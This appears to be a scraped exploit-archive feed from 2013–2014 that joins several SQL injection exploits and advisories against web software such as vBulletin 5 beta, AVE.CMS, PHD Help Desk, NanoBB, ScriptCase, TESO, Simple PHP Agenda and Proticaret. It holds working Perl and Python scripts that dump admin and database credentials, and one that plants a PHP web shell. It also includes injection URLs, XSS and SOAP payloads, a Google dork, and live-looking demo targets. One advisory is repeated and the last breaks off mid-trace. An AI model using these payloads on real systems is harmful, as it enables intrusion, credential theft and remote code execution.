#!/usr/bin/perl ################################################################################### # Satuday, March 30, 2013 # # # # _ _ .__ .__ # __| || |_| | ____ ____ |__| ____ ____ # \ __ / | _/ __ \ / ___\| |/ _ \ / \ # | || || |_\ ___// /_/ > ( <_> ) | \ # /_ ~~ _\____/\___ >___ /|__|\____/|___| / # |_||_| \/_____/ \/ # http://www.zempirians.com # # 00100011 01101100 01100101 01100111 01101001 01101111 01101110 # # # # [P]roof [o]f [C]oncept, SQL Injection # vBulletin™ is the world leader in forum and community publishing software. # # # ################################################################################### # # T E A M # # ####################### # # UberLame .......> Provided all proper payloads # Stealth ........> Thanks |
#
###################################################################################
# SUMMARY #
################
#
# http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
#
# Database error in vBulletin 5.0.0 Beta 28:
# MySQL Error : Duplicate entry '#5.1.67#1' for key 'group_key'
# Error Number : 1062
# Request Date : Saturday, March 30th 2013 @ 01:13:40 AM
# Error Date : Saturday, March 30th 2013 @ 01:13:41 AM
# Script : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
#
################
# VULNERABLE #
################
#
# vBulletin 5 beta [ALL] - http://vbulletin.com
#
################
# CONFIRMED #
################
#
# vBulletin 5 beta 17
# vBulletin 5 beta 28
#
################
# CVE #
################
#
# There is no CVE reported.
#
################
# PATCH #
################
#
# There is no PATCH available.
#
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Folder, User, Password, Number and the script will
# login and deliver the payload...
#
# [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
#
###################################################################################
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
###############################################################################
#'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
#..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
#:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
#::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
#:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
#: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
# ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
#........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
###############################################################################
[?] Homepage: http://www.zempirians.com
[?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
[?] Effected: vBulletin 5 Beta XX SQLi 0day
[?] Irc Server: irc.zempirians.com +6697
";
if (@ARGV != 5) {
print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
print "\r\n";
exit;
}
$host = $ARGV[0];
$path = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$magicnum = $ARGV[4];
$encpath = encode_base64('http://'.$host.$path);
print "\n";
print "[+] Establishing connection and logging in\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
[
'url' => $encpath,
'username' => $username,
'password' => $password,
],
Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$browser->cookie_jar( $cookie_jar );
print "[+] Send payload [ 1 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataA = $response->content;
if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
$fixversion = $1;
$fixversion =~ s/\#//g;
$fixvb = substr($dataA, 58, 23);
};
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataAB = $response->content;
if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbdb = $1;
$fixvbdb =~ s/\#//g;
};
print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
print "\n";
print "[+] Send payload [ 2 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataB = $response->content;
if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
$fixuserhost = $1;
$fixuserhost =~ s/\#//g;
print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
};
print "\n";
print "[+] Send payload [ 3 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataC = $response->content;
if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbuser = $1;
$fixvbuser =~ s/\#//g;
};
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataD = $response->content;
if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbpass = $1;
$fixvbpass =~ s/\#//g;
};
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataE = $response->content;
if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
$fixvbsalt = $1;
$fixvbsalt =~ s/\#//g;
};
print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
print "\n";
print "[+] Send payload [ 4 of 4 ]\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataF = $response->content;
if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
$fixsqluser = $1;
$fixsqluser =~ s/\#//g;
};
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataG = $response->content;
if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
$fixsqlpass = $1;
$fixsqlpass =~ s/\#//g;
};
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
],
User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
);
$dataH = $response->content;
if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
$fixsqlhost = $1;
$fixsqlhost =~ s/\#//g;
};
print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';
#print "\n\n[?] Error dump - payload 1\n\n";
#print $dataAB;
print "\n\n";
exit 1;↧
AVE.CMS 2.09 Blind SQL Injection
#!/usr/bin/env python
import urllib, sys, time
#######################################################################################
# Exploit Title: AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit
# Date: 23/05/2013
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Vendor Homepage: http://www.overdoze.ru/
# Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09
# Version: V2.09 and 2.09RC2
# Tested on: Linux Debian 2.6.32-5-686
# Description: The "module" parameter is vulnerable to Blind SQL Injection.
# Solution : Update to newest version.
#######################################################################################
print "+----------------------------------------------------------+"
print "| AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit |"
print "| mr.pr0n - http://ghostinthelab.wordpress.com |"
print "+----------------------------------------------------------+"
##
GREEN = '\033[32m'
RESET = '\033[0;0m'
##
########
true = "404"
min = 32
max = 127
num_of_ltr = 50
########
url = raw_input("\nEnter the address of the target AVE.CMS\n> ")
if url[:7] != "http://":
url = "http://" + url + "/index.php?module="
else:
url = url + "/index.php?module="
database = []
options = {'Version':'VERSION', 'User':'CURRENT_USER', 'Database':'DATABASE'}
sys.stdout.write("[+] Checking target... (please wait)...")
for element in options:
sys.stdout.write("\n [!] Database "+element+" : ")
for letter in range(1, num_of_ltr):
for i in range(min, max):
query = "-1%00' OR ORD(MID(("+options[element]+"()),"+str(letter)+",1))>"+str(i)+"#"
target = url + query
result = urllib.urlopen(target).read()
if result.find(true) != -1:
if options[element] == "DATABASE":
database.append(chr(i))
sys.stdout.write(GREEN+chr(i)+RESET)
sys.stdout.flush()
break
time.sleep(1)
database = [i for i in database if i != ' ']
database = ''.join(database)
hexdatabase = database.encode("hex")
prefix = []
sys.stdout.write("\n[+] Checking for (random) Table Prefix... (please wait)... ")
sys.stdout.write("\n [!] Table Prefix (for '"+GREEN+database+RESET+"' database) : ")
for letter in range(1, num_of_ltr):
for letter2 in range(1, 7):
for i in range(min, max):
query = "-1%00' OR ORD(MID((SELECT CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x"+hexdatabase+" LIMIT "+str(letter)+",1),"+str(letter2)+",1))>"+str(i)+"#"
target = url + query
result = urllib.urlopen(target).read()
if result.find(true) != -1:
prefix.append(chr(i))
sys.stdout.write(GREEN+chr(i)+RESET)
sys.stdout.flush()
break
time.sleep(1)
break
prefix = [i for i in prefix if i != ' ']
prefix = ''.join(prefix)
columns = {'Password':'password','Email':'email','Username':'user_name','Salt':'salt'}
sys.stdout.write("\n[+] Dumping '"+GREEN+prefix+"users"+RESET+"' table... (please wait)...")
for element in columns:
sys.stdout.write("\n [!] Column : "+element+" : ")
for letter in range(1, num_of_ltr):
for i in range(min, max):
query = "-1%00' OR ORD(MID((SELECT CONCAT("+columns[element]+") FROM "+database+"."+prefix+"users ORDER BY Id LIMIT 0,1),"+str(letter)+",1))>"+str(i)+"#"
target = url + query
result = urllib.urlopen(target).read()
if result.find(true) != -1:
sys.stdout.write(GREEN+chr(i)+RESET)
sys.stdout.flush()
break
time.sleep(1)
sys.stdout.write("\n[+] End of POC...\n")
#eof
|
↧
PHD Help Desk 2.12 SQL Injection
# Exploit Title: PHD Help Desk 2.12 SQLi
# Date: 05/24/2013
# Exploit Author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2013/06/phd-help-desk-212-sqli-and-xss.html
# Vendor Homepage: http://www.p-hd.com.ar/
# Software Link: http://downloads.sourceforge.net/project/phd/phd_released/phd%202.12/phd_2_12.zip
# Version: 2.12
# Tested on: Ubuntu 12.04 (apparmor disabled)
""" This app is so full of SQLi & XSS; if you're looking for
practice with real web apps, this is a good place to go.
You don't need auth for this.
"""
from argparse import ArgumentParser
import string
import random
import urllib, urllib2
import sys
def run(options):
print '[!] Dropping web shell on %s...'%(options.ip)
shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
# <? php system($_GET["rr"]); ?>
data = urllib.urlencode({'operador':('\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'
',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE'
' \'{0}/{1}.php'.format(options.path,shell)),
'contrasenia':'pass',
'submit':'Enter',
'captcha':''})
urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data)
print '[!] Shell dropped. http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell)
def parse():
parser = ArgumentParser()
parser.add_argument('-i',help='server address',action='store',dest='ip')
parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store',
default='/phd_2_12', dest='rootp')
parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell',
default='/var/www/phd_2_12/', action='store', dest='path')
options = parser.parse_args()
if not options.ip:
parser.print_help()
sys.exit(1)
options.path = options.path if options.path[-1] != '/' else options.path[:-1]
options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]
return options
if __name__=="__main__":
run(parse())
|
↧
↧
NanoBB 0.7 Cross Site Scripting / SQL Injection
# Exploit Title : NanoBB 0.7 Multiple Vulnerabilities
# Date : 10 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://nanobb.sourceforge.net/
# Software Link : heanet.dl.sourceforge.net/project/nanobb/v0.7.zip
# Version : 0.7
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
##############################################
VULNERABILITY: SQL Injection (Category,Topic)
##############################################
/category.php (LINE: 7-16)
-----------------------------------------------------------------------------
LINE 7-16:
$sql = "SELECT
cat_id,
cat_name,
cat_description
FROM
categories
WHERE
cat_id = " . mysql_real_escape_string($_GET['id']);
$result = mysql_query($sql);
-----------------------------------------------------------------------------
/topic.php (LINE: 7-16)
-----------------------------------------------------------------------------
LINE 11-19:
$sql = "SELECT
topic_id,
topic_subject
FROM
topics
WHERE
topics.topic_id = " . mysql_real_escape_string($_GET['id']);
$result = mysql_query($sql);
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION FOR SQL INJECTION
#####################################################
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
POC:
http://target/nano/category.php?id=9%20and%201%20div%202%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29,3
http://target/nano/topic.php?id=10%20and%201%20div%200%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29
#####################################################
VULNERABILITY: Cross Site Scripting (Create_topic.php)
#####################################################
/category.php (LINE: 106-119)
-----------------------------------------------------------------------------
LINE 106-119:
$topicid = mysql_insert_id();
$sql = "INSERT INTO
posts(post_content,
post_date,
post_topic,
post_by)
VALUES
('" . mysql_real_escape_string($_POST['post_content']) . "',
NOW(),
" . $topicid . ",
" . $_SESSION['user_id'] . "
)";
$result = mysql_query($sql);
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION FOR CROSS SITE SCRIPTING
#####################################################
An attacker might execute arbitrary HTML/JavaScript Code in the clients browser context with this security vulnerability.
User tainted data is embedded into the HTML output by the application and rendered by the users browser, thus allowing an attacker
to embed and render malicious code. Preparing a malicious link will lead to an execution of this malicious code in another users browser
context when clicking the link. This can lead to local website defacement, phishing or cookie stealing and session hijacking.
POC:
POST /nano/create_topic.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nano/create_topic.php
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
topic_subject=Test+XSS&topic_cat=7&post_content=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
|
↧
ScriptCase SQL Injection
#----------------------------------------------------------------------# # # # 1010101010101010101010101010101010101010101010101 # # 0 __ _ __ 0 # # 1 /'__`\ /' \/\ \ 1 # # 0 /\_\ \ \ __ __ /\_, \ \ \ 0 # # 1 \/_/_\_<_ /\ \ /\ \\/_/\ \ \ \ 1 # # 0 /\ \ \ \\ \ \_/ / \ \ \ \ \____ 0 # # 1 \ \____/ \ \___/ \ \_\ \_____\ 1 # # 0 \/___/ \/__/ \/_/\/_____/ 0 # # 1 1 # # 0 >> Dr.3v1l 0 # # 1 >> 0WebSecurity.IR 1 # # 0 0 # # 1 [+] E-Mail : B.Devils.B@gmail.com 1 # # 0 [+] Y! : Teacher_3v1l 0 # # 1 1 # # 0 ########################################### 0 # # 1 I'm 3v1l member from Black_Devils B0ys Team 1 # # 0 ########################################### 0 # # 1 1 # # 0101010101010101010101010101010101010101010101010 # # # #----------------------------------------------------------------------# # [~] Exploit Title : ScriptCase SQL Injection vulnerable # # [~] Date : 2013 # # [~] Author : Hossein Hezami ( Dr.3v1l ) # # [~] Software : http://www.scriptcase.net # # [~] Version : ALL Versions # # [~] E-Mail : Teacher_3v1l@yahoo.com , B.Devils.B@gmail.com # # [~] Site : 0WebSecurity.ir # # [~] Tested on : Windows XP , Windows 7 , Windows 8 # # [~] Google Dork : inurl:"/scelta_categoria.php?categoria=" # #======================================================================# # [+] SQL I Exploit : # # # # [Target]/[path]/scelta_categoria.php?categoria=[SQLi] # # # #----------------------------------------------------------------------# # [+] Demo : # # # # http://www.grossetoannunci.it/scelta_categoria.php?categoria=14 # # http://www.livorno-annunci.com/scelta_categoria.php?categoria=14 # # # #----------------------------------------------------------------------# # [+] Note : # # # # This is a simple sql injection |
↧
TESO Web 2.0 SQL Injection
============================================ TESO web 2.0 SQLInjection/ Blind SQLInjection ============================================= I. VULNERABILITY ------------------------- #Title: TESO SQLInjection/ Blind SQLInjection #Vendor:http://www.tesoweb.com #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es http://hackingmadrid.blogspot.com http://blogs.0verl0ad.com Twitter:@secnight Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn II. DESCRIPTION ------------------------- TESO is a powerful, free lets you take control of your money and your portfolio, both at home and in your business. Its main features are: Privacy and confidentiality. TESO stores no personal information nor are they ask in the registry. Police their keys and no one can associate with the accounts stored in TESO. Bank Reconciliation. TESO to load bank statements to compare (reconcile) with its own accounting. Investment Securities. TESO updates the latest quotes from more than 1000 European and American values, evaluate your portfolio and calculates realized and unrealized capital gains. You can manage your portfolio TESO without carrying a full accounting of your money Established that is not safe, it is not private and are in danger of data confidentiality III. PROOF OF CONCEPT ------------------------- ##Blind SQLInjection Affected items /default.asp Attack details URL encoded GET input lang was set to -1' or '3'='3 GET /default.asp?lang=-1%27%20or%204%20%3d%20%275 HTTP/1.1 http://www.tesoweb.es/default.asp?lang=-1%27%20or%204%20%3d%20%275 ##SQLinjection Affected items /default.asp Attack details URL encoded GET input lang was set to 1' Error message found: <font face="Arial" size=2>Syntax error in string in query expression '((idioma = '1'') and (activa = True)) order by fecha desc'.</font> GET /default.asp?lang=1%27 HTTP/1.1 http://www.tesoweb.es/default.asp?lang=1%27 IV SOLUTION ------------------------ The script should filter metacharacters from user input. It's absolutely vital to sanitize user inputs to insure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them. V. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information. |
↧
NanoBB 0.7 Cross Site Scripting / SQL Injection
# Exploit Title : NanoBB 0.7 Multiple Vulnerabilities
# Date : 10 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://nanobb.sourceforge.net/
# Software Link : heanet.dl.sourceforge.net/project/nanobb/v0.7.zip
# Version : 0.7
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
##############################################
VULNERABILITY: SQL Injection (Category,Topic)
##############################################
/category.php (LINE: 7-16)
-----------------------------------------------------------------------------
LINE 7-16:
$sql = "SELECT
cat_id,
cat_name,
cat_description
FROM
categories
WHERE
cat_id = " . mysql_real_escape_string($_GET['id']);
$result = mysql_query($sql);
-----------------------------------------------------------------------------
/topic.php (LINE: 7-16)
-----------------------------------------------------------------------------
LINE 11-19:
$sql = "SELECT
topic_id,
topic_subject
FROM
topics
WHERE
topics.topic_id = " . mysql_real_escape_string($_GET['id']);
$result = mysql_query($sql);
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION FOR SQL INJECTION
#####################################################
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
POC:
http://target/nano/category.php?id=9%20and%201%20div%202%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29,3
http://target/nano/topic.php?id=10%20and%201%20div%200%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29
#####################################################
VULNERABILITY: Cross Site Scripting (Create_topic.php)
#####################################################
/category.php (LINE: 106-119)
-----------------------------------------------------------------------------
LINE 106-119:
$topicid = mysql_insert_id();
$sql = "INSERT INTO
posts(post_content,
post_date,
post_topic,
post_by)
VALUES
('" . mysql_real_escape_string($_POST['post_content']) . "',
NOW(),
" . $topicid . ",
" . $_SESSION['user_id'] . "
)";
$result = mysql_query($sql);
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION FOR CROSS SITE SCRIPTING
#####################################################
An attacker might execute arbitrary HTML/JavaScript Code in the clients browser context with this security vulnerability.
User tainted data is embedded into the HTML output by the application and rendered by the users browser, thus allowing an attacker
to embed and render malicious code. Preparing a malicious link will lead to an execution of this malicious code in another users browser
context when clicking the link. This can lead to local website defacement, phishing or cookie stealing and session hijacking.
POC:
POST /nano/create_topic.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nano/create_topic.php
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
topic_subject=Test+XSS&topic_cat=7&post_content=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
|
↧
↧
Simple PHP Agenda 2.2.8 SQL Injection
============================================= WEBERA ALERT ADVISORY 02 - Discovered by: Anthony Dubuissez - Severity: high - CVE Request – 05/06/2013 - CVE Assign – 06/06/2013 - CVE Number – CVE-2013-3961 - Vendor notification – 06/06/2013 - Vendor reply – 10/06/2013 - Public disclosure – 11/06/2013 ============================================= I. VULNERABILITY ————————- iSQL in php-agenda <= 2.2.8 II. BACKGROUND ————————- Simple Php Agenda is « a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywere there’s internet ». III. DESCRIPTION ————————- Php-Agenda 2.2.8 and lower versions contain a flaw that allows an authenticated user iSQL attack. This flaw exists because the application does not properly sanitize parameters (only rely on mysql_real_escape_string() funcion ) in the edit_event.php file. This allows an attacker to create a specially crafted URL to dump multiple informations of the databases content. A valid account is required. IV. PROOF OF CONCEPT ————————- dumping login and password of the first admin iSQL: http://server/edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1 V. BUSINESS IMPACT ————————- iSQL: We can get sensitive information with the vulnerabilities that can escalate to a complete administrator account. VI. SYSTEMS AFFECTED ————————- Php-Agenda 2.2.8 and lower versions VII. SOLUTION ————————- sanitize correctly the GET/POST parameter. (don’t rely on the mysql_real_escape_string() functions only…) VIII. REFERENCES ————————- http://www.webera.fr/advisory-02-php-agenda-isql-exploit/ IX. CREDITS ————————- the vulnerability has been discovered by Anthony Dubuissez (anthony (dot) dubuissez (at) webera (dot) fr). X. DISCLOSURE TIMELINE ————————- June 05, 2013: Vulnerability acquired by Webera June 06, 2013: Sent to vendor. June 10, 2013: Reply of vendor, vendor release bugfix in version 2.2.9 June 11, 2013: Advisory published and sent to lists. XI. LEGAL NOTICES ————————- The information contained within this advisory is supplied « as-is » with no warranties or guarantees of fitness of use or otherwise.Webera accepts no responsibility for any damage caused by the use or misuse of this information. XII. FOLLOW US ————————- You can follow Webera, news and security advisories at: On twitter : @erathemass |
↧
Proticaret E-Commerce Script 3.0 SQL Injection
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
===========
13 Nov 2014
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Promist Bilgi Ýletiþim Teknolojileri A.Þ
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
Critical
Technical Details & Description:
========================
SQL Injection
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server
was unable to process request. --->
System.Data.SqlClient.SqlException: Conversion failed when converting
the nvarchar value 'secretpassword' to data type int.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException
exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
at
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,
